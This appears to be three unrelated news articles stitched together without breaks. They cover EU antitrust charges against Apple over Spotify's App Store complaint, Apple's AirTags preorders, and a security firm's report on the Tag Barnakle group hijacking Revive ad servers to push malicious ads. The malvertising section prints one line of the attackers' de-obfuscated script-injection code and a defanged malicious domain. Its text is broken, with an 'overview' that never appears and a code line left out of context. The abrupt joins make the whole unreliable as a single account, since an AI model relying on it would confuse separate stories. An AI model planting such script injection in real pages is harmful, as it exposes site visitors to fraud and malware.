Margrethe Vestager, the EU’s competition chief, will later this week issue charges against Apple stating that its App Store rules break EU law, according to several people with direct knowledge of the situation.
The charges relate to a complaint brought two years ago by Spotify, the music streaming app, that Apple takes 30 percent commission to distribute apps through its iPhone App Store and forbids apps from directing users to pay for subscriptions elsewhere.
Brussels opened an official competition investigation in June, when Vestager said Apple appeared to be a so-called gatekeeper “when it comes to the distribution of apps and content to users of Apple’s popular devices.”
Apple, which has denied any allegations of anticompetitive behavior, did not immediately reply to a request for comment. At the time of Spotify’s initial complaint, Apple said the music app wanted to “keep all the benefits” of its App Store “without making any contributions to that marketplace.”
The case is one of the most high-profile antitrust cases in Europe against a US tech group. The people familiar with the process warned that the timing could still slip.
Brussels is also investigating Apple for allegedly breaking EU laws when it comes to promoting its own ebooks over rivals on the App Store and over concerns that it undermines competition in mobile payments by limiting access to the near-field communication chips in iPhones for rivals to Apple Pay.
If Apple is ultimately found guilty of breaking EU rules, after a long period of potential appeals, the company faces a fine of up to 10 percent of global revenues.
Separately, Brussels is pushing through a new Digital Markets Act that seeks to define when Big Tech companies are behaving in an anti-competitive way so that remedies can be applied faster.
Spotify’s complaint against Apple
March 2019: Spotify launches official complaint against Apple in the EU. Spotify CEO Dan Ek warns of rising prices due to App Store’s fees.
May 2019: EU officials say they are preparing an official investigation.
June 2020: The EU begins probes against Apple Music, Apple’s ebook business, and Apple Pay.
March 2021: The EU says it is considering formal charges for Apple over Spotify’s complaint.
Apple began taking orders Friday for its new AirTags location-tracking product and the new purple color for the iPhone 12, but AirTag supply is already falling behind demand.
Announced earlier this week, AirTags are Apple’s answer to the already established and relatively popular Tile product. Each AirTag is a small disc that can be attached to a valuable possession so you can track it with your iPhone if you lose it.
Each AirTag sends out a Bluetooth signal that nearby compatible devices in the “Find My” network detect. When a device detects the AirTag, it reports its location, and you can use the newly rebranded “Find My” app to locate it; Apple claims the process is anonymous, secure, and encrypted.
Additionally, recent iPhone models that have Apple’s U1 ultra-wideband chip (the iPhone 11 and iPhone 12 families) enable a feature called precision finding, which guides you directly to the AirTag with more precision.
A single AirTag costs $29, but they are also sold in packs of four for $99. If you order through the Apple store, you can get your AirTag engraved at no additional charge, but that service is not available through other retailers.
Unfortunately for those excited to snag AirTags imminently, orders are already backed up two to five weeks in Apple’s online store. When you might get an AirTag depends on whether you opt for engravings; as of this writing, AirTags that are engraved are estimated to deliver as late as June 1, while AirTags that are not engraved could arrive as soon as May 3.
In addition to the AirTags themselves, Apple is selling numerous AirTags accessories, like key rings and luggage tags that can house the devices. They come in a range of colors, like saddle brown, sunflower, pink, and blue. Many of the accessories are made with partners Apple has worked with on iPhone or Apple Watch accessories in the past, like Belkin or Hermès.
As noted above, Apple is also selling a new purple variant of the iPhone 12 and iPhone 12 mini. At present, the purple iPhone 12 is still showing its initial intended delivery date: April 30.
Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious advertisements on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all outward appearances, are benign.
Going for the jugular
Infiltrating the ad ecosystem by posing as a legitimate buyer requires resources. For one, scammers must invest time learning how the market works and then creating an entity that has a trustworthy reputation. The approach also requires paying money to buy space for the malicious ads to run. That’s not the technique used by a malvertising group that security firm Confiant calls Tag Barnakle.
“Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular—mass compromise of ad serving infrastructure,” Confiant researcher Eliya Stein wrote in a blog post published Monday. “Likely, they’re also able to boast an ROI [return on investment] that would eclipse their rivals as they don’t need to spend a dime to run ad campaigns.”
Over the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for organizations that want to run their own ad server rather than relying on a third-party service. The 120 figure is twice the number of infected Revive servers Confiant found last year.
Once it has compromised an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses client-side fingerprinting to ensure only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques to ensure that they also fly under the radar.
Here’s an overview:
When Confiant reported last year on Tag Barnakle, it found the group had infected about 60 Revive servers. The feat allowed the group to distribute ads on more than 360 Web properties. The ads pushed fake Adobe Flash updates that when run installed malware on desktop computers.
var aBdDGL0KZhomY5Zl = document["createElement"]("script");
As the de-obfuscated code shows, the ads are served through overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an ad network that security firms including Malwarebytes have long documented as malicious.
When Confiant replayed the Propeller Ads click tracker on the types of devices Tag Barnakle was targeting, they saw ads like these ones:
Tens of millions served
The ads mostly lure targets to an app store listing for fake security, safety, or VPN apps with hidden subscription costs or “siphon off traffic for nefarious ends.”
With ad servers frequently integrated with multiple ad exchanges, the ads have the potential to spread widely through hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the malvertising but the firm believes the number is high.
“If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens if not hundreds of millions of devices,” Stein wrote. “This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence.”